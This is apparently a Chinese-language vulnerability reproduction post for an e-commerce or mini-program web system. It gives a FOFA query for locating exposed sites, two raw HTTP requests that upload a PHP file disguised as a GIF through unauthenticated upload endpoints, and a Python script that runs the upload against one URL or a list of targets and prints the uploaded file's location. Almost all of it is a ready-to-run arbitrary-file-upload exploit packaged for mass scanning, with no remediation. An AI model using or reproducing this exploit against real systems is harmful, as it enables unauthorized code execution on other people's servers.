漏洞复现
FOFA语句
"/seller.php?s=/Public/login"
POC1
POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 213
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="shenye.php"
Content-Type: image/gif
<?php echo('shenye');?>
------WebKitFormBoundary8UaANmWAgM4BqBSs—
poc2
POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 214
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="upfile"; filename="shenye.php"
Content-Type: image/gif
<?php echo('shenye');?>
------WebKitFormBoundary8UaANmWAgM4BqBSs--
脚本
import requests
import time
import re
import argparse
import urllib3
import base64
parser = argparse.ArgumentParser(description='This is the help!')
parser.add_argument('-u','--url', help='单个检测',default='')
parser.add_argument('-f','--file', help='多个检测',default='')
urllib3.disable_warnings()
args = parser.parse_args()
name = '''
_____ _ _ _
/ ____| | (_) (_)
| (___ | |__ _ _____ _ _ _ _
___ | '_ | |_ / | | | | | | |
____) | | | | |/ /| | |_| | |_| |
|_____/|_| |_|_/___|_|__, |__,_|
__/ |
|___/
FOFA语法:"/seller.php?s=/Public/login"
'''
print(name)
def poc(url):
target = url+"/wxapp.php?controller=Goods.doPageUpload"
headers = {
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs',
'Origin': 'null',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
}
payload ='''
Ci0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeThVYUFObVdBZ000QnFCU3MKQ29udGVudC1EaXNwb3Np
dGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1cGZpbGUiOyBmaWxlbmFtZT0iVGVzdC5waHAiCkNvbnRl
bnQtVHlwZTogaW1hZ2UvZ2lmCgo8P3BocCBlY2hvKCdUZXN0Jyk7Pz4KLS0tLS0tV2ViS2l0Rm9y
bUJvdW5kYXJ5OFVhQU5tV0FnTTRCcUJTcy0tCgk=
'''
print("-"*60)
try:
r = requests.post(url=target,headers=headers,data=base64.decodebytes(payload.encode('utf-8')).decode(),timeout=8,verify=False)
match = re.search(r'"image_o":"(.*?)",',r.text,re.I|re.M)
s = match[1]
s = s.replace('\','')
print("正在检测:"+url)
print("上传成功请访问:"+s)
except:
print("输入有误!")
print("-"*60)
def more(file):
f = open(file,'r')
for i in f.readlines():
i = i.strip()
poc(i)
print("n")
if __name__ == '__main__':
if args.url !="" and args.file =="" :
poc(args.url)
if args.url =="" and args.file !="" :
more(args.file)
